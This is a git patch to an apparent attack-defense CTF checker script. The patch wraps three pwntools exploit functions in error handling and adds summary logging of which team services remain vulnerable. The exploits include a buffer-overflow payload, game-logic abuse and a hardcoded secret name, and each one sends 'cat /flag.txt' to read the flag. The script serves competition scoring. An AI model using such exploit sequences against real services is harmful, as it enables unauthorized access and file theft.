From ba893fc03060909228f9cdd70289892688137abb Mon Sep 17 00:00:00 2001 From: myitinos Date: Sat, 2 Nov 2019 22:54:52 +0800 Subject: [PATCH] [FIX] enclose script inside try-catch --- checker.py | 143 ++++++++++++++++++++++++++++++----------------------- 1 file changed, 82 insertions(+), 61 deletions(-) diff --git a/checker.py b/checker.py index 4c71976..c0caa55 100644 --- a/checker.py +++ b/checker.py @@ -15,74 +15,53 @@ FORMAT = "SlashRootCTF" def poc0(host, port): - with remote(host, port) as p: - p.recvuntil(">") - p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) - msg = p.recvuntil(">").decode('utf-8') - # print(msg) - if "young" in msg: - p.sendline("y") - p.recvuntil(">") - p.sendline("2") - p.recvuntil(">") - p.sendline("4") + try: + with remote(host, port) as p: p.recvuntil(">") - p.sendline("y") - for _ in range(10): + p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) + msg = p.recvuntil(">").decode('utf-8') + # print(msg) + if "young" in msg: + p.sendline("y") p.recvuntil(">") - p.sendline("99") - p.sendline("cat /flag.txt") - flag = p.recvuntil("}").decode('utf-8') - # print flag - if FORMAT in flag: - return True + p.sendline("2") + p.recvuntil(">") + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in range(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recvuntil("}").decode('utf-8') + # print flag + if FORMAT in flag: + return flag[-46:] + else: + return False else: return False - else: - return False + except EOFError: + return False def poc1(host, port): - with remote(host, port) as p: - p.recvuntil(">") - p.sendline("Leo") - p.recvuntil(">") - p.sendline("y") - for _ in range(2): + try: + with remote(host, port) as p: p.recvuntil(">") - p.sendline("3") + p.sendline("Leo") p.recvuntil(">") - p.sendline("0") - if "Who" in p.recvuntil(">").decode('utf-8'): - return False p.sendline("y") - p.recvuntil(">") - p.sendline("1") - p.recvuntil(">") - p.sendline("4") - p.recvuntil(">") - p.sendline("y") - for _ in range(10): - p.recvuntil(">") - p.sendline("99") - p.sendline("cat /flag.txt") - flag = p.recvuntil("}").decode('utf-8') - if FORMAT in flag: - return True - else: - return False - - -def poc2(host, port): - with remote(host, port) as p: - p.recvuntil(">") - p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") - p.recvuntil(">") - p.sendline("y") - p.recvuntil(">") - p.sendline("6") - if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): - p.sendline("2") + for _ in range(2): + p.recvuntil(">") + p.sendline("3") + p.recvuntil(">") + p.sendline("0") + if "Who" in p.recvuntil(">").decode('utf-8'): + return False + p.sendline("y") + p.recvuntil(">") + p.sendline("1") p.recvuntil(">") p.sendline("4") p.recvuntil(">") @@ -93,11 +72,41 @@ def poc2(host, port): p.sendline("cat /flag.txt") flag = p.recvuntil("}").decode('utf-8') if FORMAT in flag: - return True + return flag[-46:] + else: + return False + except EOFError: + return False + + +def poc2(host, port): + try: + with remote(host, port) as p: + p.recvuntil(">") + p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") + p.recvuntil(">") + p.sendline("y") + p.recvuntil(">") + p.sendline("6") + if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): + p.sendline("2") + p.recvuntil(">") + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in range(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recvuntil("}").decode('utf-8') + if FORMAT in flag: + return flag[-46:] + else: + return False else: return False - else: - return False + except EOFError: + return False def poc(host, port): @@ -120,6 +129,9 @@ def check(team): r0 = poc0(HOST, port) r1 = poc1(HOST, port) r2 = poc2(HOST, port) + # r0 = False + # r1 = False + # r2 = False return "Team [{:02d}] {} {} {} {}".format(team, r, r0, r1, r2) @@ -148,6 +160,15 @@ if __name__ == "__main__": while True: with Pool(TOTAL_TEAMS) as p: results = p.map(check, range(1, TOTAL_TEAMS+1)) + r0 = r1 = r2 = r3 = 0 for result in results: checker_logger.info(result) + status = result.split(' ')[2:] + # print(status) + r0 = (r0 + 1) if status[0] != "False" else (r0) + r1 = (r1 + 1) if status[1] != "False" else (r1) + r2 = (r2 + 1) if status[2] != "False" else (r2) + r3 = (r3 + 1) if status[3] != "False" else (r3) + checker_logger.info( + "Summary: {} working as expected, 1st vuln {}, 2nd vuln {}, 3rd vuln {}".format(r0, r1, r2, r3)) sleep(INTERVAL)